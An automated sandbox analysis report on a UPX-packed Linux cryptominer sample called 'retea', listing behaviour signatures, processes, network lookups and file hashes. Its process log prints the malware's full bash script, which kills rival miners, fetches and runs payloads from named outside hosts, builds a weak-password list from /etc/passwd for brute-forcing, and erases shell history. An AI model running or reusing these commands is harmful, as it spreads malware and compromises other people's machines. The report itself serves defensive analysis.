Malware Analysis Report

2025-01-02 07:00

Sample ID 241122-wn7zcs1mfl
Target retea
SHA256 061f2562bf4ad2db25f218e218920aece057024cd2c8826c87f65acc29583191
Tags
upx xmrig_linux defense_evasion discovery miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

061f2562bf4ad2db25f218e218920aece057024cd2c8826c87f65acc29583191

Threat Level: Known bad

The file retea was found to be: Known bad.

Malicious Activity Summary

upx xmrig_linux defense_evasion discovery miner

Xmrig_linux family

xmrig

File and Directory Permissions Modification

Enumerates running processes

UPX packed file

Reads CPU attributes

Reads runtime system information

Writes file to shm directory

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-22 18:05

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-22 18:05

Reported

2024-11-22 18:09

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

57s

Max time network

147s

Command Line

[/tmp/retea]

Signatures

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /dev/shm/.x/network N/A
N/A N/A /bin/bash N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1564/cmdline /usr/bin/pkill N/A
File opened for reading /proc/207/stat /usr/bin/killall N/A
File opened for reading /proc/99/status /usr/bin/pkill N/A
File opened for reading /proc/26/status /usr/bin/pkill N/A
File opened for reading /proc/1053/cmdline /usr/bin/pkill N/A
File opened for reading /proc/499/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1280/cmdline /usr/bin/pkill N/A
File opened for reading /proc/14/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1372/cmdline /usr/bin/pkill N/A
File opened for reading /proc/263/stat /usr/bin/killall N/A
File opened for reading /proc/97/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1107/stat /usr/bin/killall N/A
File opened for reading /proc/92/status /usr/bin/pkill N/A
File opened for reading /proc/1013/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1162/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1566/status /usr/bin/pkill N/A
File opened for reading /proc/3/status /usr/bin/pkill N/A
File opened for reading /proc/1165/status /usr/bin/pkill N/A
File opened for reading /proc/411/cmdline /usr/bin/pkill N/A
File opened for reading /proc/26/status /usr/bin/pkill N/A
File opened for reading /proc/195/cmdline /usr/bin/pkill N/A
File opened for reading /proc/91/stat /usr/bin/killall N/A
File opened for reading /proc/213/status /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/675/stat /usr/bin/killall N/A
File opened for reading /proc/1310/stat /usr/bin/killall N/A
File opened for reading /proc/79/cmdline /usr/bin/pkill N/A
File opened for reading /proc/94/cmdline /usr/bin/pkill N/A
File opened for reading /proc/209/cmdline /usr/bin/pkill N/A
File opened for reading /proc/85/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1204/stat /usr/bin/killall N/A
File opened for reading /proc/73/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1254/status /usr/bin/pkill N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/79/status /usr/bin/pkill N/A
File opened for reading /proc/1062/cmdline /usr/bin/pkill N/A
File opened for reading /proc/992/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1088/status /usr/bin/pkill N/A
File opened for reading /proc/21/cmdline /usr/bin/pkill N/A
File opened for reading /proc/665/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1098/status /usr/bin/pkill N/A
File opened for reading /proc/18/cmdline /usr/bin/pkill N/A
File opened for reading /proc/588/stat /usr/bin/killall N/A
File opened for reading /proc/1228/stat /usr/bin/killall N/A
File opened for reading /proc/75/cmdline /usr/bin/pkill N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pkill N/A
File opened for reading /proc/1280/stat /usr/bin/killall N/A
File opened for reading /proc/12/status /usr/bin/pkill N/A
File opened for reading /proc/110/status /usr/bin/pkill N/A
File opened for reading /proc/22/status /usr/bin/pkill N/A
File opened for reading /proc/74/cmdline /usr/bin/pkill N/A
File opened for reading /proc/716/status /usr/bin/pkill N/A
File opened for reading /proc/586/status /usr/bin/pkill N/A
File opened for reading /proc/411/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1053/cmdline /usr/bin/pkill N/A
File opened for reading /proc/215/stat /usr/bin/killall N/A
File opened for reading /proc/1285/cmdline /usr/bin/pkill N/A
File opened for reading /proc/845/cmdline /usr/bin/pkill N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2/cmdline /usr/bin/pkill N/A
File opened for reading /proc/679/status /usr/bin/pkill N/A
File opened for reading /proc/10/status /usr/bin/pkill N/A
File opened for reading /proc/9/status /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/rm N/A

Writes file to shm directory

Description Indicator Process Target
File opened for modification /dev/shm/.x/pass /bin/bash N/A
File opened for modification /dev/shm/.x/i /bin/bash N/A
File opened for modification /dev/shm/.x/bios.txt /bin/bash N/A
File opened for modification /dev/shm/.x/.usrs /bin/bash N/A

Processes

/tmp/retea

[/tmp/retea]

/bin/bash

[/tmp/retea -c exec '/tmp/retea' "$@" /tmp/retea]

/tmp/retea

[/tmp/retea]

/bin/bash

[/tmp/retea -c #!/bin/bash key=$1 user=$2 if [[ $key == "KOFVwMxV7k7XjP7fwXPY6Cmp16vf8EnL54650LjYb6WYBtuSs3Zd1Ncr3SrpvnAU" ]] then echo -e "" else echo Logged with successfully. rm -rf .retea crontab -r ; pkill xrx ; pkill haiduc ; pkill blacku ; pkill xMEu ; cd /var/tmp ; rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp ; mkdir /tmp/.tmp ; pkill Opera ; rm -rf xmrig .diicot .black Opera ; rm -rf .black xmrig.1 ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ; wget -q dinpasiune.com/payload || curl -O -s -L dinpasiune.com/payload || wget80.76.51.5/payload || curl -O -s -L80.76.51.5/payload ; chmod +x * ; ./payload >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history chmod +x .teaca ; ./.teaca > /dev/null 2>&1 ; history -c ; rm -rf .bash_history ~/.bash_history fi rm -rf /etc/sysctl.conf ; echo "fs.file-max = 2097152" > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999 cd /dev/shm mkdir /dev/shm/.x > /dev/null 2>&1 mv network .x/ cd .x rm -rf retea ips iptemp ips iplist sleep 1 rm -rf pass useri=`cat /etc/passwd |grep -v nologin |grep -v false |grep -v sync |grep -v halt|grep -v shutdown|cut -d: -f1` echo $useri > .usrs pasus=.usrs check=`grep -c . .usrs` for us in $(cat $pasus) ; do printf "$us $us\n" >> pass printf "$us $us"$us"\n" >> pass printf "$us "$us"123\n" >> pass printf "$us "$us"123456\n" >> pass printf "$us 123456\n">> pass printf "$us 1\n">> pass printf "$us 12\n">> pass printf "$us 123\n">> pass printf "$us 1234\n">> pass printf "$us 12345\n">> pass printf "$us 12345678\n">> pass printf "$us 123456789\n">> pass printf "$us 123.com\n">> pass printf "$us 123456.com\n">> pass printf "$us 123\n" >> pass printf "$us 1qaz@WSX\n" >> pass printf "$us "$us"@123\n" >> pass printf "$us "$us"@1234\n" >> pass printf "$us "$us"@123456\n" >> pass printf "$us "$us"123\n" >> pass printf "$us "$us"1234\n" >> pass printf "$us "$us"123456\n" >> pass printf "$us qwer1234\n" >> pass printf "$us 111111\n">> pass printf "$us Passw0rd\n" >> pass printf "$us P@ssw0rd\n" >> pass printf "$us qaz123!@#\n" >> pass printf "$us !@#\n" >> pass printf "$us password\n" >> pass printf "$us Huawei@123\n" >> pass done wait sleep 0.5 cat bios.txt | sort -R | uniq | uniq > i cat i > bios.txt ./network "rm -rf /var/tmp/Documents ; mkdir /var/tmp/Documents 2>&1 ; crontab -r ; chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; cd /var/tmp ; chattr -iae /var/tmp/Documents/.diicot ; pkill Opera ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ;cd /var/tmp/; mv /var/tmp/diicot /var/tmp/Documents/.diicot ; mv /var/tmp/kuak /var/tmp/Documents/kuak ; cd /var/tmp/Documents ; chmod +x .* ; /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history ; cd /tmp/ ; wget -q 80.76.51.5/.NzJjOTYwxx5/.balu || curl -O -s -L 80.76.51.5/.NzJjOTYwxx5/.balu ; mv .balu cache ; chmod +x cache ; ./cache >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history" sleep 25 function Miner { rm -rf /dev/shm/retea /dev/shm/.magic ; rm -rf /dev/shm/.x ~/retea /tmp/kuak /tmp/diicot /tmp/.diicot ; rm -rf ~/.bash_history history -c } Miner /tmp/retea]

/usr/bin/rm

[rm -rf .retea]

/usr/bin/crontab

[crontab -r]

/usr/bin/pkill

[pkill xrx]

/usr/bin/pkill

[pkill haiduc]

/usr/bin/pkill

[pkill blacku]

/usr/bin/pkill

[pkill xMEu]

/usr/bin/rm

[rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp]

/usr/bin/mkdir

[mkdir /tmp/.tmp]

/usr/bin/pkill

[pkill Opera]

/usr/bin/rm

[rm -rf xmrig .diicot .black Opera]

/usr/bin/rm

[rm -rf .black xmrig.1]

/usr/bin/pkill

[pkill cnrig]

/usr/bin/pkill

[pkill java]

/usr/bin/killall

[killall java]

/usr/bin/pkill

[pkill xmrig]

/usr/bin/killall

[killall cnrig]

/usr/bin/killall

[killall xmrig]

/usr/bin/wget

[wget -q dinpasiune.com/payload]

/usr/bin/curl

[curl -O -s -L dinpasiune.com/payload]

/var/tmp/wget80.76.51.5/payload

[wget80.76.51.5/payload]

/usr/bin/curl

[curl -O -s -L80.76.51.5/payload]

/usr/bin/chmod

[chmod +x systemd-private-9faebdbd91c94f559bb8c94d92724182-ModemManager.service-lAvep9 systemd-private-9faebdbd91c94f559bb8c94d92724182-colord.service-uYapRX systemd-private-9faebdbd91c94f559bb8c94d92724182-power-profiles-daemon.service-15dHNu systemd-private-9faebdbd91c94f559bb8c94d92724182-switcheroo-control.service-NtnwxA systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-logind.service-1kK5cw systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-oomd.service-zbT20I systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-resolved.service-1E39rf systemd-private-9faebdbd91c94f559bb8c94d92724182-upower.service-tRdU3B]

/usr/bin/rm

[rm -rf .bash_history /root/.bash_history]

/var/tmp/payload

[./payload]

/usr/bin/chmod

[chmod +x .teaca]

/var/tmp/.teaca

[./.teaca]

/usr/bin/rm

[rm -rf .bash_history /root/.bash_history]

/usr/bin/rm

[rm -rf /etc/sysctl.conf]

/usr/sbin/sysctl

[sysctl -p]

/usr/bin/mkdir

[mkdir /dev/shm/.x]

/usr/bin/mv

[mv network .x/]

/usr/bin/rm

[rm -rf retea ips iptemp ips iplist]

/usr/bin/sleep

[sleep 1]

/usr/bin/rm

[rm -rf pass]

/usr/bin/grep

[grep -v halt]

/usr/bin/grep

[grep -v sync]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/grep

[grep -v shutdown]

/usr/bin/grep

[grep -v false]

/usr/bin/grep

[grep -v nologin]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep -c . .usrs]

/usr/bin/cat

[cat .usrs]

/usr/bin/sleep

[sleep 0.5]

/usr/bin/uniq

[uniq]

/usr/bin/sort

[sort -R]

/usr/bin/uniq

[uniq]

/usr/bin/cat

[cat bios.txt]

/usr/bin/cat

[cat i]

/dev/shm/.x/network

[./network rm -rf /var/tmp/Documents ; mkdir /var/tmp/Documents 2>&1 ; crontab -r ; chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; cd /var/tmp ; chattr -iae /var/tmp/Documents/.diicot ; pkill Opera ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ;cd /var/tmp/; mv /var/tmp/diicot /var/tmp/Documents/.diicot ; mv /var/tmp/kuak /var/tmp/Documents/kuak ; cd /var/tmp/Documents ; chmod +x .* ; /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history ; cd /tmp/ ; wget -q 80.76.51.5/.NzJjOTYwxx5/.balu || curl -O -s -L 80.76.51.5/.NzJjOTYwxx5/.balu ; mv .balu cache ; chmod +x cache ; ./cache >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history]

/usr/bin/sleep

[sleep 25]

/usr/bin/rm

[rm -rf /dev/shm/retea /dev/shm/.magic]

/usr/bin/rm

[rm -rf /dev/shm/.x /root/retea /tmp/kuak /tmp/diicot /tmp/.diicot]

/usr/bin/rm

[rm -rf /root/.bash_history]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 bashupload.com udp
US 8.8.8.8:53 bashupload.com udp
DE 116.203.186.178:80 bashupload.com tcp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp

Files

memory/1566-1-0x0000000000400000-0x00000000006c3d18-memory.dmp

memory/1566-2-0x0000000000400000-0x00000000006c3d18-memory.dmp

/dev/shm/.x/.usrs

MD5 193fbe42d4ec68ee592f790558a6b2a2
SHA1 1e71a73294e1a6cabf1c87d4241e4ed2e672879e
SHA256 6f67376894c0041f09a2128653255533724c15151006bb153e7cab389f2ff6d1
SHA512 c70248c473a9782eed317792fd8535b6674be9967cdc9450c61dc16354dbf81a1e015cc3321ebb15c3c2fdab378f4ce29e9e4f15a7cf2c1e4ba351031fba7bd6

/dev/shm/.x/pass

MD5 8098791106f621a1139c64db9e6b8604
SHA1 43b301e1e9d987c85896bea1368ef3d2fab7bb99
SHA256 2f97a866a83e4b4e086aaaffa38f0ef0279f20a333f40bdb07f3401a5ce81fe1
SHA512 e3c0415f91da102dcb1cb63fcc09cab89d08ad373cb83b48bd2f134b1e7ebc87ce20228e005735cf00e268f2f69b8de114f5ddf00de34dc40931251460487bc4

/dev/shm/.x/pass

MD5 76723d6902d4634e5c05b3622130f880
SHA1 fd0a01f2a4c57a93356e97ca54776548df682da0
SHA256 771113db09bddf605b93389525f97b4d72e8b3187b75a2cf36884938e5ca3291
SHA512 a7467f8eb5b6c3c18aa7206fed5e1645305aa828afc0368e9dd1363b13b190a53edfeda371226c041596c004dda808e173647996757474d54015c0fa81a98670

/dev/shm/.x/pass

MD5 dc96666f8a529179a201af92383360ea
SHA1 6baaba36e42373b0c8b36657d84225820b02c018
SHA256 de890c75210a94e89ee7883d28f94a6f3481ce89f6fb6e56c06f05391a438b79
SHA512 c58a22420020327de96491e3f7be282c339670442196a3dd94cd700d6214cbcff6dfea68e5418bb5c0cac983885ac4e85a44ac08917c2a7d077b812b7efbd760

/dev/shm/.x/pass

MD5 0ef6d2e7604d35dd9411089bbb1942ba
SHA1 f5a8646033c5df1a6ac820d93283d7314da4f16a
SHA256 0b2c4e44393449ec5c5184282d7790aa4fb2218085449e359816916553375ae7
SHA512 625e18753b45ad17eaf8c37213db85c9371cce7c43a822492821b6e6434f0a291ee06185bba08b41c5a51759a58c99779b765cdc38aa76f831900d5fb8c61e5f

/dev/shm/.x/pass

MD5 534c18fea42e4d4ee6821592f118fc12
SHA1 32aa842a6f8815cd3b571b0e070cd681d635a6de
SHA256 9f7ef656b1d8ed7c046d3ca49bb523b981baee7742669d7790fce5a6381254c8
SHA512 622c643a9c9e41b18b99f54eac1723332ae7bd26d42105747951e578c55be5fc2338879fd79a9008df6f6e7f69a4e203104998fe8f48ff53fddd675f209bfa90

/dev/shm/.x/pass

MD5 3059976a246142a1997b6ce328dbe4cf
SHA1 3794c3c89504f72068626242b4447f2e7912a8c5
SHA256 bbd8c4db89a96f9bbd8b0bbf9968c3ffa011f1d16c28d11b8450ae238f2bbd2b
SHA512 2514fb4cd73ef16d488c138f2dad8e55a48d3597ceade88e7a73762b3e1a6c652e30a31b1769de651433004e538c58ce0ab04b936e279598fad848e9c4460fbf